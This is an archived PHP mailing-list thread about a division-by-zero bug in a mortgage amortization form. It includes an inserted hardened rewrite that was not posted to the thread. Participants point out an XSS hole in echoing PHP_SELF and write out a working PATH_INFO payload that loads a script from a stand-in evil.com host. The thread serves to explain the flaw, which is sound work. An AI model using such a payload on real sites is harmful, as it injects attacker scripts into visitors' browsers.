
Division by 0
I have a mortgage amortization script that was working fine, now it seems to
have gone awry. Below is the entire script plus input page. I am getting an
error:
Warning: Division by zero in
/home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line
47
Which is (pow($intCalc,$totalPayments) - 1);
Frankly I am not even sure the information is being passed to the script.
Anyone see what I am missing?
Gary
<div id="onecol">Calculate your Loan</div>
<div id="leftcontent">
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
<table>
<tr>
<td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
<td><input name="loan_amount" type="text" size="25" /> USD</td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the
amount of money to be loaned.')" onmouseout="UnTip()"><img
src="images/help.png" class="noborder"/></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
<td>
<select name="type" size="1" id="type">
<option>Installment</option>
<option>Balloon</option>
</select></td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the method of
repayment.')" onmouseout="UnTip()"><img src="images/help.png"
class="noborder"/></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
<td><input name="loan_term" type="text" size="5" />
Months</td>
<td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of
time that the money is loaned for.')" onmouseout="UnTip()"><img
src="images/help.png" class="noborder" /></a></td>
</tr>
<tr>
<td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
<td><input name="int_rate" type="text" size="10" /> Per
Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage
(%) charged on loan on an annual basis.
Please see our FAQs for
information on usury rates.
If no amount is entered this will be
0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"
/></a></td>
</tr>
</table>
<label>
<input type="submit" name="submit" id="submit" value="submit" />
</label>
</form>
<?php
function amortizationTable($paymentNum, $periodicPayment, $balance,
$monthlyInterest) {
$paymentInterest = round($balance * $monthlyInterest,2);
$paymentPrincipal = round($periodicPayment - $paymentInterest,2);
$newBalance = round($balance - $paymentPrincipal,2);
print "<tr>
<td>$paymentNum</td>
<td>\$".number_format($balance,2)."</td>
<td>\$".number_format($periodicPayment,2)."</td>
<td>\$".number_format($paymentInterest,2)."</td>
<td>\$".number_format($paymentPrincipal,2)."</td>
</tr>";
# If balance not yet zero, recursively call amortizationTable()
if ($newBalance > 0) {
$paymentNum++;
amortizationTable($paymentNum, $periodicPayment, $newBalance,
$monthlyInterest);
} else {
exit;
}
} #end amortizationTable()
# Loan balance
$balance =($_POST['loan_amount']);
# Loan interest rate
$interestRate = ($_POST['int_rate']);
# Monthly interest rate
$monthlyInterest = $interestRate / 12;
# Term length of the loan, in years.
$termLength =($_POST['loan_term']);
# Number of payments per year.
$paymentsPerYear = 12;
# Payment iteration
$paymentNumber =($_POST['loan_term']);
# Perform preliminary calculations
$totalPayments = $termLength * $paymentsPerYear;
$intCalc = 1 + $interestRate / $paymentsPerYear;
$periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc -
1) /
(pow($intCalc,$totalPayments) - 1);
$periodicPayment = round($periodicPayment,2);
# Create table
echo "<table width='50%' align='center' border='1'>";
print "<tr>
<th>Payment
Number</th><th>Balance</th>
<th>Payment</th><th>Interest</th><th>Principal</th>
</tr>";
# Call recursive function
amortizationTable($paymentNumber, $periodicPayment, $balance,
$monthlyInterest);
# Close table
print "</table>";
?>
</div>
__________ Information from ESET Smart Security, version of virus signature database 4932 (20100310) __________
The message was checked by ESET Smart Security.
http://www.eset.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: Division by 0
Looks to me like you are closing your form before you put anything in
it. Therefore, the loan_amount is not set making the value 0. Follow
the math, and you are dividing by 1-1.
Change this line:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
to:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
and you should be good to go.
Joseph
Gary wrote:
> I have a mortgage amortization script that was working fine, now it seems to
> have gone awry. Below is the entire script plus input page. I am getting an
> error:
>
> Warning: Division by zero in
> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line
> 47
>
> Which is (pow($intCalc,$totalPayments) - 1);
>
> Frankly I am not even sure the information is being passed to the script.
>
> Anyone see what I am missing?
>
> Gary
>
>
Re: Division by 0
Op 3/10/10 6:23 PM, Joseph Thayne schreef:
> Looks to me like you are closing your form before you put anything in
> it. Therefore, the loan_amount is not set making the value 0. Follow
> the math, and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
this is an XSS waiting to happen. I can put something like the following in
the request uri:
index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
with regard to the original problem - some input validation is in order.
(pow($intCalc,$totalPayments) - 1);
if $intCalc and $totalPayments are both equal to 1 then either something
is wrong and the calc shouldn't be done or some other calc needs to
be done.
every value being POSTed should be checked that it's been set, and that
it's a valid numeric value (for the numeric fields) ... if anything is
missing show the form again and display an error message without doing
the calculation.
>
> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine, now it
>> seems to have gone awry. Below is the entire script plus input page.
>> I am getting an error:
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on
>> line 47
>>
>> Which is (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>>
Re: Division by 0
Joseph
My apologies for not writing sooner to thank you; you were of course
correct. Thanks again.
Gary
"Joseph Thayne" <webadmin [at] thaynefam.org> wrote in message
news:4B97E3A2.2030302 [at] thaynefam.org...
> Looks to me like you are closing your form before you put anything in it.
> Therefore, the loan_amount is not set making the value 0. Follow the
> math, and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine, now it seems
>> to have gone awry. Below is the entire script plus input page. I am
>> getting an error:
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on
>> line 47
>>
>> Which is (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>>
Re: Division by 0
On Wed, Mar 10, 2010 at 22:27, Jochem Maas <jochem [at] iamjochem.com> wrote:
> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>> Looks to me like you are closing your form before you put anything in
>> it. Therefore, the loan_amount is not set making the value 0. Follow
>> the math, and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is an XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> with regard to the original problem - some input validation is in order.
PHP_SELF doesn't contain the query string, so your particular attack
wouldn't work. It's still a security issue though.
--
Daniel Egeberg
Re: Division by 0
Hi Jochem,
Jochem Maas wrote:
> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>> Looks to me like you are closing your form before you put anything in
>> it. Therefore, the loan_amount is not set making the value 0. Follow
>> the math, and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is a XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
Apparently it's not going to work. PHP_SELF does not include query
string. So it is safe to use it this way.
Regards,
Dmitry
Re: Division by 0
On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
> Hi Jochem,
>
> Jochem Maas wrote:
>>
>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>
>>> Looks to me like you are closing your form before you put anything in
>>> it. Therefore, the loan_amount is not set making the value 0. Follow
>>> the math, and you are dividing by 1-1.
>>>
>>> Change this line:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>
>>> to:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>
>> this is an XSS waiting to happen. I can put something like the following in
>> the request uri:
>>
>> index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>>
> Apparently it's not going to work. PHP_SELF does not include query string.
> So it is safe to use it this way.
>
> Regards,
> Dmitry
No, it is not safe...
This won't work:
index.php?" onsubmit="evil()"><script
src="http://www.evil.com/evi.js"></script>
But this will:
index.php/" onsubmit="evil()"><script
src="http://www.evil.com/evi.js"></script>
--
Daniel Egeberg
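Putting Jochem's validation advice and Daniel's PATH_INFO observation together, here is an added example of a hardened handler; it is our own code, not Gary's script or anything else posted in the thread. It treats int_rate as a percentage and loan_term as a number of months, and the function names and value limits are assumptions.

```php
<?php
// Added example, not code from the thread: a hardened rewrite of the posted
// handler. It validates every POSTed field before doing arithmetic, handles
// the zero-rate case where pow($intCalc, $n) - 1 is 0 (the thread's
// "Division by zero"), and escapes $_SERVER['PHP_SELF'] so PATH_INFO such as
//   index.php/" onsubmit="..."
// cannot break out of the action attribute. Field names match the original
// form; function names and the numeric limits are our own assumptions.
declare(strict_types=1);

/**
 * Validate the numeric fields. Returns a list of error messages (empty when
 * all input is acceptable) and fills $clean with floats keyed by field name.
 */
function validateLoanInput(array $post, array &$clean): array
{
    $errors = [];
    $clean  = [];
    // field => [label, min, max]; the limits are assumptions, not from the thread
    $rules = [
        'loan_amount' => ['Loan amount',    0.01, 100000000.0],
        'loan_term'   => ['Term in months', 1.0,  600.0],
        'int_rate'    => ['Interest rate',  0.0,  100.0],
    ];
    foreach ($rules as $field => [$label, $min, $max]) {
        $raw = $post[$field] ?? '';
        if (!is_scalar($raw)) {      // loan_amount[]=1 arrives as an array: reject
            $raw = '';
        }
        // FILTER_VALIDATE_FLOAT rejects '', '5 / 12', '1e3abc', hex and embedded
        // whitespace, so a missing or garbled field never reaches the arithmetic.
        $value = filter_var(trim((string)$raw), FILTER_VALIDATE_FLOAT);
        if ($value === false) {
            $errors[] = "$label is missing or not a number.";
        } elseif ($value < $min || $value > $max) {
            $errors[] = "$label must be between $min and $max.";
        } else {
            $clean[$field] = $value;
        }
    }
    // The term must be a whole number of months.
    if (isset($clean['loan_term']) && $clean['loan_term'] != floor($clean['loan_term'])) {
        $errors[] = 'Term in months must be a whole number.';
        unset($clean['loan_term']);
    }
    return $errors;
}

/**
 * Level monthly payment for a fully amortising loan.
 * $annualRatePercent of 6.0 means 6 % per year; $months is the term length.
 */
function monthlyPayment(float $principal, float $annualRatePercent, int $months): float
{
    if ($months < 1 || $principal <= 0 || $annualRatePercent < 0) {
        throw new InvalidArgumentException('validate input before calling monthlyPayment');
    }
    $r = $annualRatePercent / 100 / 12;   // periodic rate as a fraction
    if ($r == 0.0) {
        // The annuity formula divides by (1 + r)^n - 1, which is exactly 0 when
        // r = 0, so a zero-interest loan is repaid straight-line instead.
        return round($principal / $months, 2);
    }
    $growth = (1 + $r) ** $months;
    return round($principal * $growth * $r / ($growth - 1), 2);
}

/** Self-posting action attribute; htmlspecialchars() neutralises quotes and angle brackets in PATH_INFO. */
function selfAction(): string
{
    return htmlspecialchars($_SERVER['PHP_SELF'] ?? '', ENT_QUOTES, 'UTF-8');
}

$errors = [];
$clean  = [];
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    $errors = validateLoanInput($_POST, $clean);
    if ($errors === []) {
        $payment = monthlyPayment($clean['loan_amount'], $clean['int_rate'], (int)$clean['loan_term']);
        echo '<p>Monthly payment: $' . number_format($payment, 2) . '</p>';
    } else {
        // Errors are shown and the form is redisplayed; no calculation is attempted.
        foreach ($errors as $e) {
            echo '<p class="error">' . htmlspecialchars($e, ENT_QUOTES, 'UTF-8') . '</p>';
        }
    }
}
?>
<form action="<?= selfAction() ?>" method="post">
  <input name="loan_amount" type="text" size="25" /> USD
  <input name="loan_term" type="text" size="5" /> Months
  <input name="int_rate" type="text" size="10" /> % per annum
  <input type="submit" name="submit" value="submit" />
</form>
```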
Re: Division by 0
Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
>> Hi Jochem,
>>
>> Jochem Maas wrote:
>>>
>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>
>>>> Looks to me like you are closing your form before you put anything in
>>>> it. Therefore, the loan_amount is not set making the value 0. Follow
>>>> the math, and you are dividing by 1-1.
>>>>
>>>> Change this line:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>
>>>> to:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>
>>> this is a XSS waiting to happen. I can put something like the following in
>>> the request uri:
>>>
>>> index.php?" onsubmit="evil()"><script
>>> src="http://www.evil.com/evi.js"></script>
>>>
>> Apparently it's not going to work. PHP_SELF does not include query string.
>> So it is safe to use it this way.
>>
>> Regards,
>> Dmitry
>
> No, it is not safe...
>
> This won't work:
> index.php?" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>
>
> But this will:
> index.php/" onsubmit="evil()"><script
> src="http://www.evil.com/evi.js"></script>
yeah sorry, I was lax and made the query string mistake,
the issue stands though as Daniel pointed out.
>
Re: Division by 0
I love this place, thank you to everyone that posted, I will make changes to
make it safer.
Thanks again to everyone.
gary
"Jochem Maas" <jochem [at] iamjochem.com> wrote in message
news:4B98DE7E.8020506 [at] iamjochem.com...
> Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry [at] ruban.biz> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything in
>>>>> it. Therefore, the loan_amount is not set making the value 0. Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>"
>>>>> method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following
>>>> in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js"></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
RE: Division by 0
I have tried and tried, countless times to be removed from this list...
still when I go to my deleted items I can see that emails leak through.
If there is an administrator who can simply delete me ( simply because I
can not seem to do this correctly) I would greatly appreciate it. Thank
You!
Sincerely,
Michael Roberts
Executive Recruiter
Corporate Staffing Services
150 Monument Road, Suite 510
Bala Cynwyd, PA 19004
P 610-771-1084
F 610-771-0390
E mroberts [at] jobscss.com
Check out my recent feature article in Professional Surveyor 12/09
edition.
http://www.profsurv.com/magazine/article.aspx?i=70379
-----Original Message-----
From: Gary [mailto:gwpaul [at] ptd.net]
Sent: Thursday, March 11, 2010 7:51 AM
To: php-general [at] lists.php.net
Subject: Re: [PHP] Division by 0
I love this place, thank you to everyone that posted, I will make
changes to
make it safer.
Thanks again to everyone.
gary
Re: Division by 0
Op 3/11/10 2:44 PM, Mike Roberts schreef:
> I have tried and tried, countless times to be removed from this list...
> still when I go to my deleted items I can see that emails leak through.
> If there is an administrator who can simply delete me ( simply because I
> can not seem to do this correctly) I would greatly appreciate it. Thank
> You!
>
>
>
>
no there is not (really!), either search the archives, search php.net
look at the bottom of any of the email sent via the list or check the
email headers of email sent via the list - any one of those will give
you a way out.
but that probably is a bit of a technical challenge, so try this:
send a blank email to php-general-unsubscribe [at] lists.php.net using the email
account you are subscribed to the list to. all things being equal you should
receive a message saying either that you've been removed or that you need to
confirm the removal (which means either replying once more to that message
or clicking a link).
PS - it's generally considered bad form to reply to someone else's thread rather
than send a new message when you're not engaging the current conversation.